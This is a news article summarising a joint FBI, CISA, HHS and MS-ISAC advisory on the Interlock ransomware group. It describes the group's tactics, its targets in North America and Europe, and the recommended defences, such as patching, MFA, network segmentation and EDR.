FBI Advises Caution Against Dangerous Interlock Ransomware Cyberattacks
In a coordinated effort to protect businesses and critical infrastructure, the FBI, CISA, HHS, and MS-ISAC have jointly published a security advisory detailing the tactics, methodology, and recommended defensive measures against the Interlock ransomware group.
The Interlock ransomware operators employ a double extortion tactic, exfiltrating sensitive data before encrypting systems, thereby increasing the pressure on victims to pay ransom to both restore data and prevent leaks. Unusually for ransomware, Interlock uses drive-by-download attacks from compromised legitimate websites to deliver malware and employs the ClickFix social engineering technique, tricking victims into running malicious payloads disguised as system fixes.
The ransomware encryptors affect both Windows and Linux operating systems, specifically targeting virtual machines (VMs), including VMware ESXi virtual environments. After initial compromise, actors use various methods to conduct network discovery, gain credentials, and move laterally to expand their control.
Victims receive a unique code and instructions to contact Interlock through a Tor .onion site; initial ransom demands are not included upfront. The advisory details mitigation techniques for organizations to protect against ransomware attacks from the Interlock ransomware group.
To defend against Interlock, the FBI recommends businesses to patch their systems and software, use DNS filtering and web firewalls, enforce multi-factor authentication (MFA) and strong access controls, segment their networks, and deploy robust Endpoint Detection and Response (EDR) tools, especially for virtual machines.
The Interlock ransomware group typically targets businesses and critical infrastructure organizations in North America and Europe. The group is financially motivated and uses a variety of tools for different purposes, including PowerShell-based remote access trojans (RAT), keyloggers, registry key modifications, AnyDesk, PuTTY, ScreenConnect, CobaltStrike, SystemBC, and others for command-and-control.
There are overlaps between the Interlock ransomware group and another group called Rhysida, suggesting potential team-ups or shared infrastructure. The Interlock ransom note contains a Tor link for negotiations, which are usually limited to 96 hours. The Interlock ransomware encryptors are designed for both Windows and Linux, with files receiving either a .interlock or a .1nt3rlock extension.
The Interlock ransomware group threatens to release stolen data on the dark web if ransom is not paid. As the group becomes increasingly notorious, it is crucial for businesses to implement the defensive measures outlined in the advisory to reduce both the likelihood of initial infection and limit the damage caused by ransomware activity.
[1] [3] [5] Referenced sources for further reading.
In light of the Interlock ransomware's use of technology to attack businesses and critical infrastructure, it is essential for organizations to apply cybersecurity measures, such as patching systems, deploying Endpoint Detection and Response (EDR) tools, and enforcing multi-factor authentication (MFA). Given the group's targeting of North America and Europe, it would be prudent for businesses to be vigilant against the threat posed by the Interlock ransomware group.
